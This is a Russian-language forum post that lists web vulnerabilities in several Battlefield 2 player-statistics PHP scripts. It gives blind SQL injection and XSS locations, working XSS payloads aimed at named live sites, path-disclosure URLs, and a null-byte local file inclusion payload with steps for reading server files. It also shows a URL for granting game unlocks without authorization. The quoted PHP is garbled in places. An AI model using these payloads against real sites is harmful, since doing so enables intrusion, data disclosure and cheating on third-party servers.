BF2 Stat Clone

Скачать: http://upload.com.ua/get/901846173/

Blind SQL Injection:


\queries\getPID.php

PHP:


[COLOR="Green"]BF2 Stat 1.4.2

XSS

search.php

[PHP]
PHP:
[COLOR="#007700"]if($_GET['search_pid'] ) {

echo'Find Player: "'.$_GET['search_pid'] .'"';



$players=$stats->findPlayer($_GET['search_pid'],$_GET['searchAt']);



if($players) {



echo"";

foreach($playersas$r) echo"$r[nick]";

echo"";

echo"Not finding your nick? Try to get more spe cific.
The BF2 stat servers only return 100 matche s in a set.
Also, players with a score of 0 are exlcud ed.";

....

Вписываем, Найти Игрока

По ID: ">alert(010010010)

Result: [Пример одного сайта]

[QUOTE="None"]
http://bf2.vault.ua/stats/player.php?pid=">alert(010010010)




Brainpecker's BF2 Stats v2.12

Autor Website:

http://www.brainpecker.com/

Раскрытие Пути:


http://www.brainpecker.com/bf2_stats_query.php?input1=1111


XSS [Раскрытие пути тоже видны]:

В Поле "Nick or PID 1": alert('xss')

bf2_stats_tables.php


PHP:
functionadditionalSearchResults($search_result,$ni ck) {

if(count($search_result>0)) {



// format output

$j=0;

$max=count($search_result);

for($i=0;$i".$search_result[$i]["nick"]."";

$j++;

}

}

....

Result:


http://www.brainpecker.com/bf2_stats_query.php?input1=">alert('xss')


(c)feldmarschall

зы, сорри если что-то ступил(

Проверять на скули не стал, ибо табл нету, и там каждый файл уязвим. А так читалки файлов ещё куча.

Local File Include

Need: rg=on. mq=off


/sig/sig.php?theme=../../index.php%00


Сохраняем картинку, открываем в блокноте, вуаля HTML код выполненного файла.

/sig/sig.php


PHP:
if (!file_exists($cachefilename)) {

$error="BF2Web Down and no cache file exists.";

$mode=error;

include("themes/".$theme."/theme.php");

exit;

}

Открытие анлоков.

http://bf2.u-l.ru/ASP/selectunlock.aspx?pid=252758212&id=99

Где pid - собственно плеер ид, id - идшник анлока.

Идшники анлоков можно взять тут (http://game2.bashtel.ru/game-images/unlocks/full/).